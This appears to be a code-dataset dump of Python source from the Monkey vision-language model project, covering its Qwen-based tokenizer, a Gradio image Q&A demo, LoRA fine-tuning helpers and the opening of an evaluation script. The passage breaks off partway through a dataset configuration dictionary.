id int64 0 190k | prompt stringlengths 21 13.4M | docstring stringlengths 1 12k ⌀ |
|---|---|---|
3,769 | from argparse import ArgumentParser
from pathlib import Path
import copy
import gradio as gr
import os
import re
import secrets
import tempfile
from PIL import Image
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
import shutil
from pathlib import Path
import json
class MonkeyLMHeadModel(QWenLMHeadModel):
_keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.rotary_emb\.inv_freq"]
_keys_to_ignore_on_load_unexpected = [r"h\.\d+\.attn\.masked_bias"]
def __init__(self, config):
super().__init__(config)
assert (
config.bf16 + config.fp16 + config.fp32 <= 1
), "Only one of \"bf16\", \"fp16\", \"fp32\" can be true"
autoset_precision = config.bf16 + config.fp16 + config.fp32 == 0
if autoset_precision:
if SUPPORT_BF16:
logger.warn(
"The model is automatically converting to bf16 for faster inference. "
"If you want to disable the automatic precision, please manually add bf16/fp16/fp32=True to \"AutoModelForCausalLM.from_pretrained\"."
)
config.bf16 = True
elif SUPPORT_FP16:
logger.warn(
"The model is automatically converting to fp16 for faster inference. "
"If you want to disable the automatic precision, please manually add bf16/fp16/fp32=True to \"AutoModelForCausalLM.from_pretrained\"."
)
config.fp16 = True
else:
config.fp32 = True
if config.bf16 and SUPPORT_CUDA and not SUPPORT_BF16:
logger.warn("Your device does NOT seem to support bf16, you can switch to fp16 or fp32 by by passing fp16/fp32=True in \"AutoModelForCausalLM.from_pretrained\".")
if config.fp16 and SUPPORT_CUDA and not SUPPORT_FP16:
logger.warn("Your device does NOT support faster inference with fp16, please switch to fp32 which is likely to be faster")
if config.fp32:
if SUPPORT_BF16:
logger.warn("Your device support faster inference by passing bf16=True in \"AutoModelForCausalLM.from_pretrained\".")
elif SUPPORT_FP16:
logger.warn("Your device support faster inference by passing fp16=True in \"AutoModelForCausalLM.from_pretrained\".")
self.transformer = MonkeyModel(config)
self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
if config.bf16:
self.transformer.bfloat16()
self.lm_head.bfloat16()
if config.fp16:
self.transformer.half()
self.lm_head.half()
self.post_init()
class QWenTokenizer(PreTrainedTokenizer):
"""QWen tokenizer."""
vocab_files_names = VOCAB_FILES_NAMES
def __init__(
self,
vocab_file,
errors="replace",
image_start_tag='<img>',
image_end_tag='</img>',
image_pad_tag='<imgpad>',
ref_start_tag='<ref>',
ref_end_tag='</ref>',
box_start_tag='<box>',
box_end_tag='</box>',
quad_start_tag='<quad>',
quad_end_tag='</quad>',
**kwargs,
):
super().__init__(**kwargs)
self.image_start_tag = image_start_tag
self.image_end_tag = image_end_tag
self.image_pad_tag = image_pad_tag
self.ref_start_tag = ref_start_tag
self.ref_end_tag = ref_end_tag
self.box_start_tag = box_start_tag
self.box_end_tag = box_end_tag
self.quad_start_tag = quad_start_tag
self.quad_end_tag = quad_end_tag
self.IMAGE_ST = (
ref_start_tag, ref_end_tag,
box_start_tag, box_end_tag,
quad_start_tag, quad_end_tag,
image_start_tag, image_end_tag,
image_pad_tag
)
self.errors = errors # how to handle errors in decoding
self.mergeable_ranks = _load_tiktoken_bpe(vocab_file) # type: dict[bytes, int]
self.special_tokens = {
token: index
for index, token in enumerate(
SPECIAL_TOKENS + self.IMAGE_ST, start=len(self.mergeable_ranks)
)
}
self.img_start_id = self.special_tokens[self.image_start_tag]
self.img_end_id = self.special_tokens[self.image_end_tag]
self.img_pad_id = self.special_tokens[self.image_pad_tag]
self.ref_start_id = self.special_tokens[self.ref_start_tag]
self.ref_end_id = self.special_tokens[self.ref_end_tag]
self.box_start_id = self.special_tokens[self.box_start_tag]
self.box_end_id = self.special_tokens[self.box_end_tag]
self.quad_start_id = self.special_tokens[self.quad_start_tag]
self.quad_end_id = self.special_tokens[self.quad_end_tag]
enc = tiktoken.Encoding(
"Qwen",
pat_str=PAT_STR,
mergeable_ranks=self.mergeable_ranks,
special_tokens=self.special_tokens,
)
assert (
len(self.mergeable_ranks) + len(self.special_tokens) == enc.n_vocab
), f"{len(self.mergeable_ranks) + len(self.special_tokens)} != {enc.n_vocab} in encoding"
self.decoder = {
v: k for k, v in self.mergeable_ranks.items()
} # type: dict[int, bytes|str]
self.decoder.update({v: k for k, v in self.special_tokens.items()})
self.tokenizer = enc # type: tiktoken.Encoding
self.eod_id = self.tokenizer.eot_token
self.im_start_id = self.special_tokens[IMSTART]
self.im_end_id = self.special_tokens[IMEND]
def __getstate__(self):
# for pickle lovers
state = self.__dict__.copy()
del state['tokenizer']
return state
def __setstate__(self, state):
# tokenizer is not python native; don't pass it; rebuild it
self.__dict__.update(state)
enc = tiktoken.Encoding(
"Qwen",
pat_str=PAT_STR,
mergeable_ranks=self.mergeable_ranks,
special_tokens=self.special_tokens,
)
self.tokenizer = enc
def __len__(self) -> int:
return self.tokenizer.n_vocab
def get_vocab(self) -> Dict[bytes, int]:
return self.mergeable_ranks
def convert_tokens_to_ids(
self, tokens: Union[bytes, str, List[Union[bytes, str]]]
) -> List[int]:
ids = []
if isinstance(tokens, (str, bytes)):
if tokens in self.special_tokens:
return self.special_tokens[tokens]
else:
return self.mergeable_ranks.get(tokens)
for token in tokens:
if token in self.special_tokens:
ids.append(self.special_tokens[token])
else:
ids.append(self.mergeable_ranks.get(token))
return ids
def _add_tokens(self, new_tokens: Union[List[str], List[AddedToken]], special_tokens: bool = False) -> int:
if not special_tokens and new_tokens:
raise ValueError('Adding regular tokens is not supported')
for token in new_tokens:
surface_form = token.content if isinstance(token, AddedToken) else token
if surface_form not in SPECIAL_TOKENS + self.IMAGE_ST:
raise ValueError('Adding unknown special tokens is not supported')
return 0
def save_vocabulary(self, save_directory: str, **kwargs) -> Tuple[str]:
"""
Save only the vocabulary of the tokenizer (vocabulary).
Returns:
`Tuple(str)`: Paths to the files saved.
"""
file_path = os.path.join(save_directory, "qwen.tiktoken")
with open(file_path, "w", encoding="utf8") as w:
for k, v in self.mergeable_ranks.items():
line = base64.b64encode(k).decode("utf8") + " " + str(v) + "\n"
w.write(line)
return (file_path,)
def tokenize(
self,
text: str,
allowed_special: Union[Set, str] = "all",
disallowed_special: Union[Collection, str] = (),
**kwargs,
) -> List[Union[bytes, str]]:
"""
Converts a string in a sequence of tokens.
Args:
text (`str`):
The sequence to be encoded.
allowed_special (`Literal["all"]` or `set`):
The surface forms of the tokens to be encoded as special tokens in regular texts.
Default to "all".
disallowed_special (`Literal["all"]` or `Collection`):
The surface forms of the tokens that should not be in regular texts and trigger errors.
Default to an empty tuple.
kwargs (additional keyword arguments, *optional*):
Will be passed to the underlying model specific encode method.
Returns:
`List[bytes|str]`: The list of tokens.
"""
tokens = []
text = unicodedata.normalize("NFC", text)
# this implementation takes a detour: text -> token id -> token surface forms
for t in self.tokenizer.encode(
text, allowed_special=allowed_special, disallowed_special=disallowed_special
):
tokens.append(self.decoder[t])
def _encode_imgurl(img_tokens):
assert img_tokens[0] == self.image_start_tag and img_tokens[-1] == self.image_end_tag
img_tokens = img_tokens[1:-1]
img_url = b''.join(img_tokens)
out_img_tokens = list(map(self.decoder.get, img_url))
if len(out_img_tokens) > IMG_TOKEN_SPAN:
raise ValueError("The content in {}..{} is too long".format(
self.image_start_tag, self.image_end_tag))
out_img_tokens.extend([self.image_pad_tag] * (IMG_TOKEN_SPAN - len(out_img_tokens)))
out_img_tokens = [self.image_start_tag] + out_img_tokens + [self.image_end_tag]
return out_img_tokens
return _replace_closed_tag(tokens, self.image_start_tag, self.image_end_tag, _encode_imgurl)
def convert_tokens_to_string(self, tokens: List[Union[bytes, str]]) -> str:
"""
Converts a sequence of tokens in a single string.
"""
text = ""
temp = b""
for t in tokens:
if isinstance(t, str):
if temp:
text += temp.decode("utf-8", errors=self.errors)
temp = b""
text += t
elif isinstance(t, bytes):
temp += t
else:
raise TypeError("token should only be of type types or str")
if temp:
text += temp.decode("utf-8", errors=self.errors)
return text
def vocab_size(self):
return self.tokenizer.n_vocab
def _convert_id_to_token(self, index: int) -> Union[bytes, str]:
"""Converts an id to a token, special tokens included"""
if index in self.decoder:
return self.decoder[index]
raise ValueError("unknown ids")
def _convert_token_to_id(self, token: Union[bytes, str]) -> int:
"""Converts a token to an id using the vocab, special tokens included"""
if token in self.special_tokens:
return self.special_tokens[token]
if token in self.mergeable_ranks:
return self.mergeable_ranks[token]
raise ValueError("unknown token")
def _tokenize(self, text: str, **kwargs):
"""
Converts a string in a sequence of tokens (string), using the tokenizer. Split in words for word-based
vocabulary or sub-words for sub-word-based vocabularies (BPE/SentencePieces/WordPieces).
Do NOT take care of added tokens.
"""
raise NotImplementedError
def _decode(
self,
token_ids: Union[int, List[int]],
skip_special_tokens: bool = False,
errors: str = None,
**kwargs,
) -> str:
if isinstance(token_ids, int):
token_ids = [token_ids]
def _decode_imgurl(img_token_ids):
assert img_token_ids[0] == self.img_start_id and img_token_ids[-1] == self.img_end_id
img_token_ids = img_token_ids[1:-1]
img_token_ids = img_token_ids[ : img_token_ids.index(self.img_pad_id)]
img_url = bytes(img_token_ids).decode('utf-8')
return [self.img_start_id] + self.tokenizer.encode(img_url) + [self.img_end_id]
token_ids = _replace_closed_tag(token_ids, self.img_start_id, self.img_end_id, _decode_imgurl)
if skip_special_tokens:
token_ids = [i for i in token_ids if i < self.eod_id]
return self.tokenizer.decode(token_ids, errors=errors or self.errors)
def to_list_format(self, text: str):
text = unicodedata.normalize("NFC", text)
token_ids = self.tokenizer.encode(
text, allowed_special=set(self.IMAGE_ST + (ENDOFTEXT,)))
def _encode_vl_info(tokens):
if len(tokens) == 0:
return []
if tokens[0] == self.img_start_id and tokens[-1] == self.img_end_id:
key = 'image'
elif tokens[0] == self.ref_start_id and tokens[-1] == self.ref_end_id:
key = 'ref'
elif tokens[0] == self.box_start_id and tokens[-1] == self.box_end_id:
key = 'box'
elif tokens[0] == self.quad_start_id and tokens[-1] == self.quad_end_id:
key = 'quad'
else:
_tobytes = lambda x: x.encode('utf-8') if isinstance(x, str) else x
return [{'text': b''.join(map(_tobytes, map(self.decoder.get, tokens))).decode('utf-8')}]
_tobytes = lambda x: x.encode('utf-8') if isinstance(x, str) else x
val = b''.join(map(_tobytes, map(self.decoder.get, tokens[1:-1]))).decode('utf-8')
return [{key: val}]
return _replace_closed_tag(
token_ids,
(self.img_start_id, self.ref_start_id, self.box_start_id, self.quad_start_id),
(self.img_end_id, self.ref_end_id, self.box_end_id, self.quad_end_id),
_encode_vl_info,
_encode_vl_info,
)
def from_list_format(self, list_format: List[Dict]):
text = ''
num_images = 0
for ele in list_format:
if 'image' in ele:
num_images += 1
text += f'Picture {num_images}:'
text += self.image_start_tag + ele['image'] + self.image_end_tag
text += '\n'
elif 'text' in ele:
text += ele['text']
elif 'box' in ele:
if 'ref' in ele:
text += self.ref_start_tag + ele['ref'] + self.ref_end_tag
for box in ele['box']:
text += self.box_start_tag + '(%d,%d),(%d,%d)' % (box[0], box[1], box[2], box[3]) + self.box_end_tag
else:
raise ValueError("Unsupport element: " + str(ele))
return text
def _fetch_latest_picture(self, response, history):
if history is None:
history = []
_history = history + [(response, None)]
for q, r in _history[::-1]:
for ele in self.to_list_format(q)[::-1]:
if 'image' in ele:
return ele['image']
return None
def _fetch_all_box_with_ref(self, text):
list_format = self.to_list_format(text)
output = []
for i, ele in enumerate(list_format):
if 'box' in ele:
bbox = tuple(map(int, ele['box'].replace('(', '').replace(')', '').split(',')))
assert len(bbox) == 4
output.append({'box': bbox})
if i > 0 and 'ref' in list_format[i-1]:
output[-1]['ref'] = list_format[i-1]['ref'].strip()
return output
def draw_bbox_on_latest_picture(
self,
response,
history=None,
) -> Optional[Image.Image]:
image = self._fetch_latest_picture(response, history)
if image is None:
return None
if image.startswith("http://") or image.startswith("https://"):
image = Image.open(requests.get(image, stream=True).raw).convert("RGB")
h, w = image.height, image.width
else:
image = np.asarray(Image.open(image).convert("RGB"))
h, w = image.shape[0], image.shape[1]
visualizer = Visualizer(image)
boxes = self._fetch_all_box_with_ref(response)
if not boxes:
return None
color = random.choice([_ for _ in mcolors.TABLEAU_COLORS.keys()]) # init color
for box in boxes:
if 'ref' in box: # random new color for new refexps
color = random.choice([_ for _ in mcolors.TABLEAU_COLORS.keys()])
x1, y1, x2, y2 = box['box']
x1, y1, x2, y2 = (int(x1 / 1000 * w), int(y1 / 1000 * h), int(x2 / 1000 * w), int(y2 / 1000 * h))
visualizer.draw_box((x1, y1, x2, y2), alpha=1, edge_color=color)
if 'ref' in box:
visualizer.draw_text(box['ref'], (x1, y1), color=color, horizontal_alignment="left")
return visualizer.output
def _load_model_tokenizer(args):
tokenizer = QWenTokenizer.from_pretrained(
args.checkpoint_path, trust_remote_code=True)
if args.cpu_only:
device_map = "cpu"
else:
device_map = "cuda"
model = MonkeyLMHeadModel.from_pretrained(
args.checkpoint_path,
device_map=device_map,
trust_remote_code=True,
).eval()
# model.generation_config = GenerationConfig.from_pretrained(
# args.checkpoint_path, trust_remote_code=True, resume_download=True,
# )
tokenizer.padding_side = 'left'
tokenizer.pad_token_id = tokenizer.eod_id
return model, tokenizer | null |
3,770 | from argparse import ArgumentParser
from pathlib import Path
import copy
import gradio as gr
import os
import re
import secrets
import tempfile
from PIL import Image
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
import shutil
from pathlib import Path
import json
PUNCTUATION = "!?。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟…‧﹏."
title_markdown = ("""
# Welcome to Monkey
Hello! I'm Monkey, a Large Language and Vision Assistant. Before talking to me, please read the **Operation Guide** and **Terms of Use**.
你好!我是Monkey,一个大型语言和视觉助理。在与我交谈之前,请阅读**操作指南**和**使用条款**。
## Operation Guide 操作指南
Click the **Upload** button to upload an image. Then, you can get Monkey's answer in two ways:点击**Upload**上传图像。你可以通过两种方式得到Monkey的回答:
- Click the **Generate** and Monkey will generate a description of the image. 点击**Generate**,Monkey将生成图像的描述。
- Enter the question in the dialog box, click the **Submit**, and Monkey will answer the question based on the image. 在对话框中输入问题,点击**Submit**,Monkey会根据图片回答问题。
- Click **Clear History** to clear the current image and Q&A content.点击**Clear History**,清除当前图片和问答内容。
> Note: Monkey does not have a multi-round dialogue function. Perhaps we will further develop its capabilities in the future. 注意:Monkey没有多轮对话功能,或许我们在未来会进一步开发它的能力。
> Monkey支持中文,但使用英文提问会比使用中文效果明显好.""")
policy_markdown = ("""
## Terms of Use
By using this service, users are required to agree to the following terms:
- Monkey is for research use only and unauthorized commercial use is prohibited. For any query, please contact the author.
- Monkey's generation capabilities are limited, so we recommend that users do not rely entirely on its answers.
- Monkey's security measures are limited, so we cannot guarantee that the output is completely appropriate. We strongly recommend that users do not intentionally guide Monkey to generate harmful content, including hate speech, discrimination, violence, pornography, deception, etc.
""")
def _parse_text(text):
def _launch_demo(args, model, tokenizer):
def predict(_chatbot, task_history):
chat_query = _chatbot[-1][0]
query = task_history[-1][0]
question = _parse_text(query)
print("User: " + _parse_text(query))
full_response = ""
img_path = _chatbot[0][0][0]
try:
Image.open(img_path)
except:
response = "Please upload a picture."
_chatbot[-1] = (_parse_text(chat_query), response)
full_response = _parse_text(response)
task_history[-1] = (query, full_response)
print("Monkey: " + _parse_text(full_response))
return _chatbot
query = f'<img>{img_path}</img> {question} Answer: '
print(query)
input_ids = tokenizer(query, return_tensors='pt', padding='longest')
attention_mask = input_ids.attention_mask
input_ids = input_ids.input_ids
pred = model.generate(
input_ids=input_ids.cuda(),
attention_mask=attention_mask.cuda(),
do_sample=False,
num_beams=1,
max_new_tokens=512,
min_new_tokens=1,
length_penalty=3,
num_return_sequences=1,
output_hidden_states=True,
use_cache=True,
pad_token_id=tokenizer.eod_id,
eos_token_id=tokenizer.eod_id,
)
response = tokenizer.decode(pred[0][input_ids.size(1):].cpu(), skip_special_tokens=True).strip()
_chatbot[-1] = (_parse_text(chat_query), response)
full_response = _parse_text(response)
task_history[-1] = (query, full_response)
print("Monkey: " + _parse_text(full_response))
return _chatbot
def caption(_chatbot, task_history):
query = "Generate the detailed caption in English:"
chat_query = "Generate the detailed caption in English:"
question = _parse_text(query)
print("User: " + _parse_text(query))
full_response = ""
try:
img_path = _chatbot[0][0][0]
Image.open(img_path)
except:
response = "Please upload a picture."
_chatbot.append((None, response))
full_response = _parse_text(response)
task_history.append((None, full_response))
print("Monkey: " + _parse_text(full_response))
return _chatbot
img_path = _chatbot[0][0][0]
query = f'<img>{img_path}</img> {chat_query} '
print(query)
input_ids = tokenizer(query, return_tensors='pt', padding='longest')
attention_mask = input_ids.attention_mask
input_ids = input_ids.input_ids
pred = model.generate(
input_ids=input_ids.cuda(),
attention_mask=attention_mask.cuda(),
do_sample=True,
temperature=0.7,
max_new_tokens=250,
min_new_tokens=1,
length_penalty=3,
num_return_sequences=1,
output_hidden_states=True,
use_cache=True,
pad_token_id=tokenizer.eod_id,
eos_token_id=tokenizer.eod_id,
)
response = tokenizer.decode(pred[0][input_ids.size(1):].cpu(), skip_special_tokens=True).strip()
_chatbot.append((None, response))
full_response = _parse_text(response)
task_history.append((None, full_response))
print("Monkey: " + _parse_text(full_response))
return _chatbot
def add_text(history, task_history, text):
task_text = text
if len(text) >= 2 and text[-1] in PUNCTUATION and text[-2] not in PUNCTUATION:
task_text = text[:-1]
history = history + [(_parse_text(text), None)]
task_history = task_history + [(task_text, None)]
print(history, task_history, text)
return history, task_history, ""
def add_file(history, task_history, file):
history = [((file.name,), None)]
task_history = [((file.name,), None)]
print(history, task_history, file)
return history, task_history
def reset_user_input():
return gr.update(value="")
def reset_state(task_history):
task_history.clear()
return []
with gr.Blocks() as demo:
gr.Markdown(title_markdown)
chatbot = gr.Chatbot(label='Monkey', elem_classes="control-height", height=600,avatar_images=("https://ooo.0x0.ooo/2023/11/09/OehsLx.png","https://ooo.0x0.ooo/2023/11/09/OehGBC.png"),layout="bubble",bubble_full_width=False,show_copy_button=True)
query = gr.Textbox(lines=1, label='Input')
task_history = gr.State([])
with gr.Row():
empty_bin = gr.Button("Clear History (清空)")
submit_btn = gr.Button("Submit (提问)")
generate_btn_en = gr.Button("Generate")
addfile_btn = gr.UploadButton("Upload (上传图片)", file_types=["image"])
submit_btn.click(add_text, [chatbot, task_history, query], [chatbot, task_history]).then(
predict, [chatbot, task_history], [chatbot], show_progress=True
)
generate_btn_en.click(caption, [chatbot, task_history], [chatbot], show_progress=True)
submit_btn.click(reset_user_input, [], [query])
empty_bin.click(reset_state, [task_history], [chatbot], show_progress=True)
addfile_btn.upload(add_file, [chatbot, task_history, addfile_btn], [chatbot, task_history], show_progress=True,scroll_to_output=True)
gr.Markdown(policy_markdown)
demo.queue().launch(
server_name="0.0.0.0",
server_port=7681
) | null |
3,771 | from dataclasses import dataclass, field
import json
import math
import logging
import os
from typing import Dict, Optional, List
import torch
from torch.utils.data import Dataset
from deepspeed import zero
from deepspeed.runtime.zero.partition_parameters import ZeroParamStatus
import transformers
from transformers import Trainer, GPTQConfig, deepspeed
from transformers.trainer_pt_utils import LabelSmoother
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from accelerate.utils import DistributedType
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
def maybe_zero_3(param):
if hasattr(param, "ds_id"):
assert param.ds_status == ZeroParamStatus.NOT_AVAILABLE
with zero.GatheredParameters([param]):
param = param.data.detach().cpu().clone()
else:
param = param.detach().cpu().clone()
return param
import numpy as np
import random
def get_peft_state_maybe_zero_3(named_params, bias):
if bias == "none":
to_return = {k: t for k, t in named_params if "lora_" in k}
elif bias == "all":
to_return = {k: t for k, t in named_params if "lora_" in k or "bias" in k}
elif bias == "lora_only":
to_return = {}
maybe_lora_bias = {}
lora_bias_names = set()
for k, t in named_params:
if "lora_" in k:
to_return[k] = t
bias_name = k.split("lora_")[0] + "bias"
lora_bias_names.add(bias_name)
elif "bias" in k:
maybe_lora_bias[k] = t
for k, t in maybe_lora_bias:
if bias_name in lora_bias_names:
to_return[bias_name] = t
else:
raise NotImplementedError
to_return = {k: maybe_zero_3(v) for k, v in to_return.items()}
return to_return | null |
3,772 | from dataclasses import dataclass, field
import json
import math
import logging
import os
from typing import Dict, Optional, List
import torch
from torch.utils.data import Dataset
from deepspeed import zero
from deepspeed.runtime.zero.partition_parameters import ZeroParamStatus
import transformers
from transformers import Trainer, GPTQConfig, deepspeed
from transformers.trainer_pt_utils import LabelSmoother
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from accelerate.utils import DistributedType
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
IGNORE_TOKEN_ID = LabelSmoother.ignore_index
def format_tokenizer(tokenizer, message, return_target=False, label=False):
_input_ids = tokenizer(message).input_ids
input_ids = _input_ids
if return_target:
if label:
target = input_ids
else:
target = [IGNORE_TOKEN_ID] * (len(_input_ids))
return input_ids, target
else:
return input_ids
import numpy as np
import random
def preprocess(
source,
tokenizer,
max_len,
system_message: str = "You are a helpful assistant.",
padding=True
):
# Apply prompt templates
input_ids, targets = [], []
user, assistant = source[0], source[1]
user_input = user['value']
assistant_input = assistant['value']
message_l = [user_input, assistant_input]
for i, message in enumerate(message_l):
try:
_input_ids, _target = format_tokenizer(tokenizer, message, return_target=True, label=True if i == len(message_l) - 1 else False) # <img> 有些text会有img标签,所以使用<img>作为特殊id有问题,标签数量不对等会报错
except Exception as e:
print(e)
continue
input_ids += _input_ids
targets += _target
assert len(_input_ids) == len(_input_ids)
if padding:
input_ids += [-1]+[tokenizer.pad_token_id] * (max_len - len(input_ids)-1)
targets += [tokenizer.pad_token_id] +[IGNORE_TOKEN_ID] * (max_len - len(targets)-1)
targets = targets[:max_len]
input_ids = input_ids[:max_len]
input_ids = torch.tensor(input_ids, dtype=torch.int)
targets = torch.tensor(targets, dtype=torch.int)
attention_mask=input_ids.ne(tokenizer.pad_token_id)
input_ids[input_ids == -1 ] = tokenizer.pad_token_id
return dict(
input_ids=input_ids,
labels=targets,
attention_mask=attention_mask,
) | null |
3,773 | from dataclasses import dataclass, field
import json
import math
import logging
import os
from typing import Dict, Optional, List
import torch
from torch.utils.data import Dataset
from deepspeed import zero
from deepspeed.runtime.zero.partition_parameters import ZeroParamStatus
import transformers
from transformers import Trainer, GPTQConfig, deepspeed
from transformers.trainer_pt_utils import LabelSmoother
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from accelerate.utils import DistributedType
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
class ModelArguments:
class DataArguments:
class TrainingArguments(transformers.TrainingArguments):
class LoraArguments:
local_rank = None
def rank0_print(*args):
def safe_save_model_for_hf_trainer(trainer: transformers.Trainer, output_dir: str, bias="none"):
def make_supervised_data_module(
tokenizer: transformers.PreTrainedTokenizer, data_args, max_len,
) -> Dict:
def print_trainable_params(model: torch.nn.Module):
import numpy as np
import random
class MonkeyLMHeadModel(QWenLMHeadModel):
def __init__(self, config):
class QWenTokenizer(PreTrainedTokenizer):
def __init__(
self,
vocab_file,
errors="replace",
image_start_tag='<img>',
image_end_tag='</img>',
image_pad_tag='<imgpad>',
ref_start_tag='<ref>',
ref_end_tag='</ref>',
box_start_tag='<box>',
box_end_tag='</box>',
quad_start_tag='<quad>',
quad_end_tag='</quad>',
**kwargs,
):
def __getstate__(self):
def __setstate__(self, state):
def __len__(self) -> int:
def get_vocab(self) -> Dict[bytes, int]:
def convert_tokens_to_ids(
self, tokens: Union[bytes, str, List[Union[bytes, str]]]
) -> List[int]:
def _add_tokens(self, new_tokens: Union[List[str], List[AddedToken]], special_tokens: bool = False) -> int:
def save_vocabulary(self, save_directory: str, **kwargs) -> Tuple[str]:
def tokenize(
self,
text: str,
allowed_special: Union[Set, str] = "all",
disallowed_special: Union[Collection, str] = (),
**kwargs,
) -> List[Union[bytes, str]]:
def _encode_imgurl(img_tokens):
def convert_tokens_to_string(self, tokens: List[Union[bytes, str]]) -> str:
def vocab_size(self):
def _convert_id_to_token(self, index: int) -> Union[bytes, str]:
def _convert_token_to_id(self, token: Union[bytes, str]) -> int:
def _tokenize(self, text: str, **kwargs):
def _decode(
self,
token_ids: Union[int, List[int]],
skip_special_tokens: bool = False,
errors: str = None,
**kwargs,
) -> str:
def _decode_imgurl(img_token_ids):
def to_list_format(self, text: str):
def _encode_vl_info(tokens):
def from_list_format(self, list_format: List[Dict]):
def _fetch_latest_picture(self, response, history):
def _fetch_all_box_with_ref(self, text):
def draw_bbox_on_latest_picture(
self,
response,
history=None,
) -> Optional[Image.Image]:
class MonkeyConfig(PretrainedConfig):
def __init__(
self,
vocab_size=151936,
hidden_size=4096,
num_hidden_layers=32,
num_attention_heads=32,
emb_dropout_prob=0.0,
attn_dropout_prob=0.0,
layer_norm_epsilon=1e-6,
initializer_range=0.02,
max_position_embeddings=8192,
scale_attn_weights=True,
use_cache=True,
bf16=False,
fp16=False,
fp32=False,
kv_channels=128,
rotary_pct=1.0,
rotary_emb_base=10000,
use_dynamic_ntk=True,
use_logn_attn=True,
use_flash_attn="auto",
intermediate_size=22016,
no_bias=True,
tie_word_embeddings=False,
**kwargs,
):
def train():
global local_rank
parser = transformers.HfArgumentParser(
(ModelArguments, DataArguments, TrainingArguments, LoraArguments)
)
(
model_args,
data_args,
training_args,
lora_args,
) = parser.parse_args_into_dataclasses()
if getattr(training_args, 'deepspeed', None) and getattr(lora_args, 'q_lora', False):
training_args.distributed_state.distributed_type = DistributedType.DEEPSPEED
compute_dtype = (
torch.float16
if training_args.fp16
else (torch.bfloat16 if training_args.bf16 else torch.float32)
)
local_rank = training_args.local_rank
device_map = None
world_size = int(os.environ.get("WORLD_SIZE", 1))
ddp = world_size != 1
if lora_args.q_lora:
device_map = {"": int(os.environ.get("LOCAL_RANK") or 0)} if ddp else None
if len(training_args.fsdp) > 0 or deepspeed.is_deepspeed_zero3_enabled():
logging.warning(
"FSDP or ZeRO3 are not incompatible with QLoRA."
)
# Set RoPE scaling factor
config = MonkeyConfig.from_pretrained(
"monkey_model",
cache_dir=training_args.cache_dir,
trust_remote_code=True,
)
rank0_print(config)
config.use_cache = False
# Load model and tokenizer
rank0_print("loading base model")
model = MonkeyLMHeadModel.from_pretrained(
model_args.model_name_or_path,
config=config,
cache_dir=training_args.cache_dir,
device_map=device_map,
trust_remote_code=True,
quantization_config=GPTQConfig(
bits=4, disable_exllama=True
)
if training_args.use_lora and lora_args.q_lora
else None,
)
tokenizer = QWenTokenizer.from_pretrained(
"monkey_model",
cache_dir=training_args.cache_dir,
model_max_length=training_args.model_max_length,
padding_side="right",
use_fast=False,
trust_remote_code=True,
)
tokenizer.pad_token_id = tokenizer.eod_id
if not training_args.use_lora:
if training_args.fix_vit and hasattr(model,'transformer') and hasattr(model.transformer,'visual'):
model.transformer.visual.requires_grad_(False)
if hasattr(model.transformer.visual,'attn_pool'):
model.transformer.visual.attn_pool.requires_grad_(True)
for k,v in model.named_parameters():
if "lora" in k :
v.requires_grad_(True)
if training_args.use_lora:
if lora_args.q_lora or "chat" in model_args.model_name_or_path.lower():
modules_to_save = None
else:
modules_to_save = []
lora_config = LoraConfig(
r=lora_args.lora_r,
lora_alpha=lora_args.lora_alpha,
target_modules=lora_args.lora_target_modules,
lora_dropout=lora_args.lora_dropout,
bias=lora_args.lora_bias,
task_type="CAUSAL_LM",
modules_to_save=modules_to_save # This argument serves for adding new tokens.
)
model = get_peft_model(model, lora_config)
if training_args.gradient_checkpointing:
model.enable_input_require_grads()
print_trainable_params(model)
# Load data
data_module = make_supervised_data_module(
tokenizer=tokenizer, data_args=data_args, max_len=training_args.model_max_length
)
# Start trainner
trainer = Trainer(
model=model, tokenizer=tokenizer, args=training_args, **data_module
)
trainer.train()
trainer.save_state()
safe_save_model_for_hf_trainer(trainer=trainer, output_dir=training_args.output_dir, bias=lora_args.lora_bias) | null |
3,774 | from dataclasses import dataclass, field
import json
import math
import logging
import os
from typing import Dict, Optional, List
import torch
from torch.utils.data import Dataset
from deepspeed import zero
from deepspeed.runtime.zero.partition_parameters import ZeroParamStatus
import transformers
from transformers import Trainer, GPTQConfig, deepspeed
from transformers.trainer_pt_utils import LabelSmoother
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from accelerate.utils import DistributedType
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
import numpy as np
import random
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
# torch.backends.cudnn.deterministic = True
# torch.backends.cudnn.benchmark = False
os.environ["PYTHONHASHSEED"] = str(seed) | null |
3,775 | import argparse
import itertools
import json
import os
import random
import time
from functools import partial
from typing import Optional
import sys
import torch
from tqdm import tqdm
from vqa import VQA
from vqa_eval import VQAEval
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
import numpy as np
from pathlib import Path
ds_collections = {
'estvqa_test': {
'train': 'data/ESTVQA/estvqa.jsonl',
'test': 'data/estvqa/estvqa.jsonl',
'metric': 'anls',
'max_new_tokens': 100,
},
'docvqa_test': {
'train': 'data/docvqa/train.jsonl',
'test': 'data/docvqa/test_ans.jsonl',
'metric': 'anls',
'max_new_tokens': 100,
},
'chartqa': {
